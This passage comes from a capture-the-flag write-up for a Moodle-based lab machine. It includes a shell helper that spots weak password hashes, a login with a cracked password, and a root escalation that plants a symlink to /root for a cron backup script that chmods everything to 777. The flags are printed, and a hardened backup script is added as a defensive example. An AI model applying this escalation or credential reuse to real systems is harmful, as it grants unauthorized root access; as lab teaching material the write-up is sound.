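        '$2y$'*|'$2a$'*|'$2b$'*) echo bcrypt ;;
        *)
            if printf '%s\n' "$1" | grep -Eq '^[0-9a-f]{32}$'; then
                echo legacy-md5
            else
                echo unknown
            fi
            ;;
    esac
}

# weak_hash_accounts: read "username hash" lines on stdin and print the
# usernames whose hash is anything other than bcrypt.
weak_hash_accounts() {
    while read -r user hash; do
        [ -n "$user" ] || continue
        [ "$(classify_hash "$hash")" = bcrypt ] || echo "$user"
    done
}

# Sample input: the rows of the mdl_user table shown above.
SAMPLE_USERS='guest $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO
admin $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2
giovanni $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO
Giovannibak 7a860966115182402ed06375cf0a22af'

# Usage: printf '%s\n' "$SAMPLE_USERS" | weak_hash_accounts   # prints Giovannibak
```

The same two functions work on a real export (for example the output of the SELECT above saved with a tab or space separator); anything reported as legacy-md5 or unknown is a credential that a wordlist attack like the one in this section will find quickly, and the backup account name suggests the row was never meant to remain a login.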

We can use the credentials “giovanni:expelled” with the su command.
As usual, user.txt is in the home directory.

www-data@teacher:/var/www/html/moodle$ su giovanni
su giovanni
Password: expelled

giovanni@teacher:/var/www/html/moodle$ cd
cd
giovanni@teacher:~$ cat user.txt
cat user.txt
fa9ae187462530e841d9e61936648fa7

3. Getting Root

If we run the following command, the modification time of the “courses” directory suggests that an automated process is running and modifying this directory.

giovanni@teacher:~/work$ ls -la
ls -la
total 16
drwxr-xr-x 4 giovanni giovanni 4096 Apr 26 21:28 .
drwxr-x--- 4 giovanni giovanni 4096 Nov  4 19:47 ..
drwxrwxrwx 3 giovanni giovanni 4096 Apr 26 21:28 courses
drwxrwxrwx 3 giovanni giovanni 4096 Jun 27  2018 tmp

At the same time, we can find an interesting file, backup.sh, in “/usr/bin”.

giovanni@teacher:/usr/bin$ cat backup.sh
cat backup.sh
#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;

This script does the following:

  1. backs up the directory ~/work/courses into an archive
  2. extracts the archive into ~/work/tmp
  3. gives permission 777 to everything that was extracted, recursively
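Everything that goes wrong with this job comes from two choices: it copies whatever is in ~/work/courses, symbolic links included, and then runs chmod 777 -R as root over the result. As an added example that is not the box's script, the following POSIX shell version of the same job refuses to run when the source or the unpacked tree contains a symbolic link, starts every run from a clean staging directory, and sets 0750/0640 modes with find, which never follows links. The safe_backup and tree_has_no_symlinks names and the STAGING/extracted layout are assumptions of this example.

```shell
#!/bin/sh
# Hardened replacement for the backup job above. This is an added example, not the
# script from the box: it performs the same two steps (archive, then extract into a
# staging area) but refuses symbolic links and never applies chmod 777.
# Assumed interface: safe_backup SRC_DIR STAGING_DIR (both names are assumptions).
set -e

# tree_has_no_symlinks DIR: succeed only if DIR contains no symbolic links.
# find does not follow links, so it lists the link itself without touching its target.
tree_has_no_symlinks() {
    [ -z "$(find "$1" -type l -print | head -n 1)" ]
}

# safe_backup SRC STAGING
# Archives SRC into STAGING/backup_courses.tar.gz, unpacks the archive under
# STAGING/extracted and sets owner-and-group-only permissions on the copy.
safe_backup() {
    src=$1
    staging=$2
    archive="$staging/backup_courses.tar.gz"
    extracted="$staging/extracted"

    # A link such as courses/root -> /root would otherwise end up in the archive
    # and, after extraction, in the tree whose permissions root then rewrites.
    if ! tree_has_no_symlinks "$src"; then
        echo "refusing to back up $src: symbolic link found" >&2
        return 1
    fi

    mkdir -p "$staging"
    # -C strips the leading path so the archive holds only basename(SRC)/...
    tar -czf "$archive" -C "$(dirname "$src")" "$(basename "$src")"

    # Start from an empty directory: a leftover tree could have been modified
    # by the directory owner between two runs of the job.
    rm -rf "$extracted"
    mkdir -p "$extracted"
    tar -xzf "$archive" -C "$extracted"

    # Verify the unpacked tree too, then apply least-privilege modes with find,
    # which never descends through symbolic links, instead of "chmod 777 * -R".
    if ! tree_has_no_symlinks "$extracted"; then
        echo "archive contained a symbolic link; discarding extracted copy" >&2
        rm -rf "$extracted"
        return 1
    fi
    find "$extracted" -type d -exec chmod 0750 {} +
    find "$extracted" -type f -exec chmod 0640 {} +
}

# Usage (as the job would call it): safe_backup /home/giovanni/work/courses /home/giovanni/work/tmp
```

When a check fails the job exits non-zero instead of silently handing out permissions, so a planted link shows up in cron's output rather than in /root. The script itself must of course live in a root-owned, non-writable location, unlike a user-writable ~/work tree.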

Then create a symbolic link to /root in ~/work/courses; the next backup run copies it into ~/work/tmp/courses.

giovanni@teacher:~/work/courses$ ln -s /root/ root
ln -s /root/ root

giovanni@teacher:~/work/tmp/courses$ ls -la
ls -la
total 12
drwxrwxrwx 3 root     root     4096 Apr 26 21:42 .
drwxrwxrwx 3 giovanni giovanni 4096 Apr 26 21:38 ..
drwxrwxrwx 2 root     root     4096 Jun 27  2018 algebra
lrwxrwxrwx 1 giovanni giovanni    6 Apr 26 21:28 root -> /root/

We have to wait for the cron job to run.
After that, we can read root.txt through the symbolic link.

giovanni@teacher:~/work/tmp$ cat root/root.txt
cat root/root.txt
4f3a83b42ac7723a508b8ace7b8b1209